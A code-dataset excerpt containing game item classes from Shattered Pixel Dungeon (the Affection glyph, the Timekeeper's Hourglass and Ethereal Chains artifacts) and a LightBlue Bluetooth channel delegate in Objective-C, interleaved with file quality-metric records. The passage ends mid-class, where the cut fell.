"qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/armor/glyphs/Affection.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.armor.glyphs;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Charm;
import com.shatteredpixel.shatteredpixeldungeon.effects.Speck;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor;
import com.shatteredpixel.shatteredpixeldungeon.items.armor.Armor.Glyph;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite.Glowing;
import com.watabou.utils.Random;
public class Affection extends Glyph {
private static ItemSprite.Glowing PINK = new ItemSprite.Glowing( 0xFF4488 );
@Override
public int proc( Armor armor, Char attacker, Char defender, int damage) {
int level = Math.max(0, armor.level());
// lvl 0 - 15%
// lvl 1 ~ 19%
// lvl 2 ~ 23%
if (Random.Int( level + 20 ) >= 17) {
int duration = Random.IntRange( 8, 12 );
Buff.affect( attacker, Charm.class, duration ).object = defender.id();
attacker.sprite.centerEmitter().start( Speck.factory( Speck.HEART ), 0.2f, 5 );
}
return damage;
}
@Override
public Glowing glowing() {
return PINK;
}
}
| 2,067 | Affection | java | en | java | code | {"qsc_code_num_words": 269, "qsc_code_num_chars": 2067.0, "qsc_code_mean_word_length": 5.78066914, "qsc_code_frac_words_unique": 0.52416357, "qsc_code_frac_chars_top_2grams": 0.09839228, "qsc_code_frac_chars_top_3grams": 0.21993569, "qsc_code_frac_chars_top_4grams": 0.22636656, "qsc_code_frac_chars_dupe_5grams": 0.34083601, "qsc_code_frac_chars_dupe_6grams": 0.26109325, "qsc_code_frac_chars_dupe_7grams": 0.07588424, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02402746, "qsc_code_frac_chars_whitespace": 0.15432995, "qsc_code_size_file_byte": 2067.0, "qsc_code_num_lines": 61.0, "qsc_code_num_chars_line_max": 83.0, "qsc_code_num_chars_line_mean": 33.8852459, "qsc_code_frac_chars_alphabet": 0.86556064, "qsc_code_frac_chars_comments": 0.39816159, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07407407, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00643087, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.07407407, "qsc_codejava_score_lines_no_logic": 0.51851852, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 1, "qsc_code_frac_chars_top_4grams": 1, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 1, "qsc_codejava_frac_lines_print": 0} |
0-1-0/lightblue-0.4 | src/mac/LightAquaBlue/BBBluetoothChannelDelegate.m | /*
* Copyright (c) 2009 Bea Lam. All rights reserved.
*
* This file is part of LightBlue.
*
* LightBlue is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* LightBlue is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with LightBlue. If not, see <http://www.gnu.org/licenses/>.
*/
//
// BBBluetoothChannelDelegate.m
// LightAquaBlue
//
#import "BBBluetoothChannelDelegate.h"
#import <IOBluetooth/objc/IOBluetoothRFCOMMChannel.h>
#import <IOBluetooth/objc/IOBluetoothL2CAPChannel.h>
static SEL channelDataSelector;
static SEL channelClosedSelector;
@implementation BBBluetoothChannelDelegate
+ (void)initialize
{
channelDataSelector = @selector(channelData:data:);
channelClosedSelector = @selector(channelClosed:);
}
- (id)initWithDelegate:(id)delegate
{
self = [super init];
m_delegate = delegate;
return self;
}
- (void)rfcommChannelData:(IOBluetoothRFCOMMChannel *)rfcommChannel
data:(void *)dataPointer
length:(size_t)dataLength
{
if (m_delegate && [m_delegate respondsToSelector:channelDataSelector]) {
[m_delegate channelData:rfcommChannel
data:[NSData dataWithBytes:dataPointer length:dataLength]];
}
}
- (void)rfcommChannelClosed:(IOBluetoothRFCOMMChannel *)rfcommChannel
{
if (m_delegate && [m_delegate respondsToSelector:channelClosedSelector]) {
[m_delegate channelClosed:rfcommChannel];
}
}
- (void)l2capChannelData:(IOBluetoothL2CAPChannel *)l2capChannel
data:(void *)dataPointer
length:(size_t)dataLength
{
if (m_delegate && [m_delegate respondsToSelector:channelDataSelector]) {
[m_delegate channelData:l2capChannel
data:[NSData dataWithBytes:dataPointer length:dataLength]];
}
}
- (void)l2capChannelClosed:(IOBluetoothL2CAPChannel *)l2capChannel
{
if (m_delegate && [m_delegate respondsToSelector:channelClosedSelector]) {
[m_delegate channelClosed:l2capChannel];
}
}
+ (IOReturn)synchronouslyWriteData:(NSData *)data
toRFCOMMChannel:(IOBluetoothRFCOMMChannel *)channel
{
return [channel writeSync:(void *)[data bytes] length:[data length]];
}
+ (IOReturn)synchronouslyWriteData:(NSData *)data
toL2CAPChannel:(IOBluetoothL2CAPChannel *)channel
{
return [channel writeSync:(void *)[data bytes] length:[data length]];
}
@end
| 2,923 | BBBluetoothChannelDelegate | m | en | limbo | code | {"qsc_code_num_words": 279, "qsc_code_num_chars": 2923.0, "qsc_code_mean_word_length": 7.2437276, "qsc_code_frac_words_unique": 0.44444444, "qsc_code_frac_chars_top_2grams": 0.05789213, "qsc_code_frac_chars_top_3grams": 0.0217714, "qsc_code_frac_chars_top_4grams": 0.02375062, "qsc_code_frac_chars_dupe_5grams": 0.3473528, "qsc_code_frac_chars_dupe_6grams": 0.33448788, "qsc_code_frac_chars_dupe_7grams": 0.30677882, "qsc_code_frac_chars_dupe_8grams": 0.25333993, "qsc_code_frac_chars_dupe_9grams": 0.25333993, "qsc_code_frac_chars_dupe_10grams": 0.25333993, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00693241, "qsc_code_frac_chars_whitespace": 0.21040027, "qsc_code_size_file_byte": 2923.0, "qsc_code_num_lines": 95.0, "qsc_code_num_chars_line_max": 87.0, "qsc_code_num_chars_line_mean": 30.76842105, "qsc_code_frac_chars_alphabet": 0.8687175, "qsc_code_frac_chars_comments": 0.04994868, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.20779221, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/artifacts/TimekeepersHourglass.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.artifacts;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Hunger;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.LockedFloor;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.actors.mobs.Mob;
import com.shatteredpixel.shatteredpixeldungeon.items.Item;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.CharSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.shatteredpixel.shatteredpixeldungeon.windows.WndOptions;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundle;
import com.watabou.utils.Random;
import java.util.ArrayList;
public class TimekeepersHourglass extends Artifact {
{
image = ItemSpriteSheet.ARTIFACT_HOURGLASS;
levelCap = 5;
charge = 5+level();
partialCharge = 0;
chargeCap = 5+level();
defaultAction = AC_ACTIVATE;
}
public static final String AC_ACTIVATE = "ACTIVATE";
//keeps track of generated sandbags.
public int sandBags = 0;
@Override
public ArrayList<String> actions( Hero hero ) {
ArrayList<String> actions = super.actions( hero );
if (isEquipped( hero ) && charge > 0 && !cursed)
actions.add(AC_ACTIVATE);
return actions;
}
@Override
public void execute( Hero hero, String action ) {
super.execute(hero, action);
if (action.equals(AC_ACTIVATE)){
if (!isEquipped( hero )) GLog.i( Messages.get(Artifact.class, "need_to_equip") );
else if (activeBuff != null) {
if (activeBuff instanceof timeStasis) { //do nothing
} else {
activeBuff.detach();
GLog.i( Messages.get(this, "deactivate") );
}
} else if (charge <= 0) GLog.i( Messages.get(this, "no_charge") );
else if (cursed) GLog.i( Messages.get(this, "cursed") );
else GameScene.show(
new WndOptions( Messages.get(this, "name"),
Messages.get(this, "prompt"),
Messages.get(this, "stasis"),
Messages.get(this, "freeze")) {
@Override
protected void onSelect(int index) {
if (index == 0) {
GLog.i( Messages.get(TimekeepersHourglass.class, "onstasis") );
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_TELEPORT);
activeBuff = new timeStasis();
activeBuff.attachTo(Dungeon.hero);
} else if (index == 1) {
GLog.i( Messages.get(TimekeepersHourglass.class, "onfreeze") );
GameScene.flash(0xFFFFFF);
Sample.INSTANCE.play(Assets.SND_TELEPORT);
activeBuff = new timeFreeze();
activeBuff.attachTo(Dungeon.hero);
((timeFreeze)activeBuff).processTime(0f);
}
}
}
);
}
}
@Override
public void activate(Char ch) {
super.activate(ch);
if (activeBuff != null)
activeBuff.attachTo(ch);
}
@Override
public boolean doUnequip(Hero hero, boolean collect, boolean single) {
if (super.doUnequip(hero, collect, single)){
if (activeBuff != null){
activeBuff.detach();
activeBuff = null;
}
return true;
} else
return false;
}
@Override
protected ArtifactBuff passiveBuff() {
return new hourglassRecharge();
}
@Override
public void charge(Hero target) {
if (charge < chargeCap){
partialCharge += 0.25f;
if (partialCharge >= 1){
partialCharge--;
charge++;
updateQuickslot();
}
}
}
@Override
public Item upgrade() {
chargeCap+= 1;
//for artifact transmutation.
while (level()+1 > sandBags)
sandBags ++;
return super.upgrade();
}
@Override
public String desc() {
String desc = super.desc();
if (isEquipped( Dungeon.hero )){
if (!cursed) {
if (level() < levelCap )
desc += "\n\n" + Messages.get(this, "desc_hint");
} else
desc += "\n\n" + Messages.get(this, "desc_cursed");
}
return desc;
}
private static final String SANDBAGS = "sandbags";
private static final String BUFF = "buff";
@Override
public void storeInBundle( Bundle bundle ) {
super.storeInBundle(bundle);
bundle.put( SANDBAGS, sandBags );
if (activeBuff != null)
bundle.put( BUFF , activeBuff );
}
@Override
public void restoreFromBundle( Bundle bundle ) {
super.restoreFromBundle(bundle);
sandBags = bundle.getInt( SANDBAGS );
//these buffs belong to hourglass, need to handle unbundling within the hourglass class.
if (bundle.contains( BUFF )){
Bundle buffBundle = bundle.getBundle( BUFF );
if (buffBundle.contains( timeFreeze.PRESSES ))
activeBuff = new timeFreeze();
else
activeBuff = new timeStasis();
activeBuff.restoreFromBundle(buffBundle);
}
}
public class hourglassRecharge extends ArtifactBuff {
@Override
public boolean act() {
LockedFloor lock = target.buff(LockedFloor.class);
if (charge < chargeCap && !cursed && (lock == null || lock.regenOn())) {
partialCharge += 1 / (90f - (chargeCap - charge)*3f);
if (partialCharge >= 1) {
partialCharge --;
charge ++;
if (charge == chargeCap){
partialCharge = 0;
}
}
} else if (cursed && Random.Int(10) == 0)
((Hero) target).spend( TICK );
updateQuickslot();
spend( TICK );
return true;
}
}
public class timeStasis extends ArtifactBuff {
{
type = buffType.POSITIVE;
}
@Override
public boolean attachTo(Char target) {
if (super.attachTo(target)) {
int usedCharge = Math.min(charge, 2);
//buffs always act last, so the stasis buff should end a turn early.
spend((5*usedCharge) - 1);
((Hero) target).spendAndNext(5*usedCharge);
//shouldn't punish the player for going into stasis frequently
Hunger hunger = Buff.affect(target, Hunger.class);
if (hunger != null && !hunger.isStarving())
hunger.satisfy(5*usedCharge);
charge -= usedCharge;
target.invisible++;
updateQuickslot();
Dungeon.observe();
return true;
} else {
return false;
}
}
@Override
public boolean act() {
detach();
return true;
}
@Override
public void detach() {
if (target.invisible > 0)
target.invisible --;
super.detach();
activeBuff = null;
Dungeon.observe();
}
}
public class timeFreeze extends ArtifactBuff {
{
type = buffType.POSITIVE;
}
float turnsToCost = 0f;
ArrayList<Integer> presses = new ArrayList<>();
public void processTime(float time){
turnsToCost -= time;
while (turnsToCost < 0f){
turnsToCost += 2f;
charge --;
}
updateQuickslot();
if (charge < 0){
charge = 0;
detach();
}
}
public void setDelayedPress(int cell){
if (!presses.contains(cell))
presses.add(cell);
}
private void triggerPresses(){
for (int cell : presses)
Dungeon.level.pressCell(cell);
presses = new ArrayList<>();
}
@Override
public boolean attachTo(Char target) {
if (Dungeon.level != null)
for (Mob mob : Dungeon.level.mobs.toArray(new Mob[0]))
mob.sprite.add(CharSprite.State.PARALYSED);
GameScene.freezeEmitters = true;
return super.attachTo(target);
}
@Override
public void detach(){
for (Mob mob : Dungeon.level.mobs.toArray(new Mob[0]))
if (mob.paralysed <= 0) mob.sprite.remove(CharSprite.State.PARALYSED);
GameScene.freezeEmitters = false;
updateQuickslot();
super.detach();
activeBuff = null;
triggerPresses();
target.next();
}
private static final String PRESSES = "presses";
private static final String TURNSTOCOST = "turnsToCost";
@Override
public void storeInBundle(Bundle bundle) {
super.storeInBundle(bundle);
int[] values = new int[presses.size()];
for (int i = 0; i < values.length; i ++)
values[i] = presses.get(i);
bundle.put( PRESSES , values );
bundle.put( TURNSTOCOST , turnsToCost);
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
int[] values = bundle.getIntArray( PRESSES );
for (int value : values)
presses.add(value);
turnsToCost = bundle.getFloat( TURNSTOCOST );
}
}
public static class sandBag extends Item {
{
image = ItemSpriteSheet.SANDBAG;
}
@Override
public boolean doPickUp( Hero hero ) {
TimekeepersHourglass hourglass = hero.belongings.getItem( TimekeepersHourglass.class );
if (hourglass != null && !hourglass.cursed) {
hourglass.upgrade();
Sample.INSTANCE.play( Assets.SND_DEWDROP );
if (hourglass.level() == hourglass.levelCap)
GLog.p( Messages.get(this, "maxlevel") );
else
GLog.i( Messages.get(this, "levelup") );
hero.spendAndNext(TIME_TO_PICK_UP);
return true;
} else {
GLog.w( Messages.get(this, "no_hourglass") );
return false;
}
}
@Override
public int price() {
return 10;
}
}
}
| 10,005 | TimekeepersHourglass | java | en | java | code | {"qsc_code_num_words": 1100, "qsc_code_num_chars": 10005.0, "qsc_code_mean_word_length": 6.13, "qsc_code_frac_words_unique": 0.26181818, "qsc_code_frac_chars_top_2grams": 0.03944832, "qsc_code_frac_chars_top_3grams": 0.09016758, "qsc_code_frac_chars_top_4grams": 0.09787928, "qsc_code_frac_chars_dupe_5grams": 0.25774878, "qsc_code_frac_chars_dupe_6grams": 0.14874685, "qsc_code_frac_chars_dupe_7grams": 0.09402343, "qsc_code_frac_chars_dupe_8grams": 0.07444758, "qsc_code_frac_chars_dupe_9grams": 0.07444758, "qsc_code_frac_chars_dupe_10grams": 0.03232982, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00766428, "qsc_code_frac_chars_whitespace": 0.20449775, "qsc_code_size_file_byte": 10005.0, "qsc_code_num_lines": 406.0, "qsc_code_num_chars_line_max": 92.0, "qsc_code_num_chars_line_mean": 24.64285714, "qsc_code_frac_chars_alphabet": 0.83955271, "qsc_code_frac_chars_comments": 0.10754623, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.30100334, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01892709, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00179191, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.08026756, "qsc_codejava_score_lines_no_logic": 0.19397993, "qsc_codejava_frac_words_no_modifier": 0.82142857, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.25, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/artifacts/EtherealChains.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.artifacts;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Buff;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Cripple;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.LockedFloor;
import com.shatteredpixel.shatteredpixeldungeon.actors.hero.Hero;
import com.shatteredpixel.shatteredpixeldungeon.effects.Chains;
import com.shatteredpixel.shatteredpixeldungeon.effects.Pushing;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.CellSelector;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.ui.QuickSlotButton;
import com.shatteredpixel.shatteredpixeldungeon.utils.BArray;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.utils.Callback;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
import java.util.ArrayList;
public class EtherealChains extends Artifact {
public static final String AC_CAST = "CAST";
{
image = ItemSpriteSheet.ARTIFACT_CHAINS;
levelCap = 5;
exp = 0;
charge = 5;
defaultAction = AC_CAST;
usesTargeting = true;
}
@Override
public ArrayList<String> actions(Hero hero) {
ArrayList<String> actions = super.actions( hero );
if (isEquipped(hero) && charge > 0 && !cursed)
actions.add(AC_CAST);
return actions;
}
@Override
public void execute(Hero hero, String action) {
super.execute(hero, action);
if (action.equals(AC_CAST)){
curUser = hero;
if (!isEquipped( hero )) {
GLog.i( Messages.get(Artifact.class, "need_to_equip") );
QuickSlotButton.cancel();
} else if (charge < 1) {
GLog.i( Messages.get(this, "no_charge") );
QuickSlotButton.cancel();
} else if (cursed) {
GLog.w( Messages.get(this, "cursed") );
QuickSlotButton.cancel();
} else {
GameScene.selectCell(caster);
}
}
}
private CellSelector.Listener caster = new CellSelector.Listener(){
@Override
public void onSelect(Integer target) {
if (target != null && (Dungeon.level.visited[target] || Dungeon.level.mapped[target])){
//chains cannot be used to go where it is impossible to walk to
PathFinder.buildDistanceMap(target, BArray.or(Dungeon.level.passable, Dungeon.level.avoid, null));
if (PathFinder.distance[curUser.pos] == Integer.MAX_VALUE){
GLog.w( Messages.get(EtherealChains.class, "cant_reach") );
return;
}
final Ballistica chain = new Ballistica(curUser.pos, target, Ballistica.STOP_TARGET);
if (Actor.findChar( chain.collisionPos ) != null){
chainEnemy( chain, curUser, Actor.findChar( chain.collisionPos ));
} else {
chainLocation( chain, curUser );
}
}
}
@Override
public String prompt() {
return Messages.get(EtherealChains.class, "prompt");
}
};
//pulls an enemy to a position along the chain's path, as close to the hero as possible
private void chainEnemy( Ballistica chain, final Hero hero, final Char enemy ){
if (enemy.properties().contains(Char.Property.IMMOVABLE)) {
GLog.w( Messages.get(this, "cant_pull") );
return;
}
int bestPos = -1;
for (int i : chain.subPath(1, chain.dist)){
//prefer to the earliest point on the path
if (!Dungeon.level.solid[i] && Actor.findChar(i) == null){
bestPos = i;
break;
}
}
if (bestPos == -1) {
GLog.i(Messages.get(this, "does_nothing"));
return;
}
final int pulledPos = bestPos;
int chargeUse = Dungeon.level.distance(enemy.pos, pulledPos);
if (chargeUse > charge) {
GLog.w( Messages.get(this, "no_charge") );
return;
} else {
charge -= chargeUse;
updateQuickslot();
}
hero.busy();
hero.sprite.parent.add(new Chains(hero.sprite.center(), enemy.sprite.center(), new Callback() {
public void call() {
Actor.add(new Pushing(enemy, enemy.pos, pulledPos, new Callback() {
public void call() {
Dungeon.level.occupyCell(enemy);
}
}));
enemy.pos = pulledPos;
Dungeon.observe();
GameScene.updateFog();
hero.spendAndNext(1f);
}
}));
}
//pulls the hero along the chain to the collosionPos, if possible.
private void chainLocation( Ballistica chain, final Hero hero ){
//don't pull if the collision spot is in a wall
if (Dungeon.level.solid[chain.collisionPos]){
GLog.i( Messages.get(this, "inside_wall"));
return;
}
//don't pull if there are no solid objects next to the pull location
boolean solidFound = false;
for (int i : PathFinder.NEIGHBOURS8){
if (Dungeon.level.solid[chain.collisionPos + i]){
solidFound = true;
break;
}
}
if (!solidFound){
GLog.i( Messages.get(EtherealChains.class, "nothing_to_grab") );
return;
}
final int newHeroPos = chain.collisionPos;
int chargeUse = Dungeon.level.distance(hero.pos, newHeroPos);
if (chargeUse > charge){
GLog.w( Messages.get(EtherealChains.class, "no_charge") );
return;
} else {
charge -= chargeUse;
updateQuickslot();
}
hero.busy();
hero.sprite.parent.add(new Chains(hero.sprite.center(), DungeonTilemap.raisedTileCenterToWorld(newHeroPos), new Callback() {
public void call() {
Actor.add(new Pushing(hero, hero.pos, newHeroPos, new Callback() {
public void call() {
Dungeon.level.occupyCell(hero);
}
}));
hero.spendAndNext(1f);
hero.pos = newHeroPos;
Dungeon.observe();
GameScene.updateFog();
}
}));
}
@Override
protected ArtifactBuff passiveBuff() {
return new chainsRecharge();
}
@Override
public void charge(Hero target) {
int chargeTarget = 5+(level()*2);
if (charge < chargeTarget*2){
partialCharge += 0.5f;
if (partialCharge >= 1){
partialCharge--;
charge++;
updateQuickslot();
}
}
}
@Override
public String desc() {
String desc = super.desc();
if (isEquipped( Dungeon.hero )){
desc += "\n\n";
if (cursed)
desc += Messages.get(this, "desc_cursed");
else
desc += Messages.get(this, "desc_equipped");
}
return desc;
}
public class chainsRecharge extends ArtifactBuff{
@Override
public boolean act() {
int chargeTarget = 5+(level()*2);
LockedFloor lock = target.buff(LockedFloor.class);
if (charge < chargeTarget && !cursed && (lock == null || lock.regenOn())) {
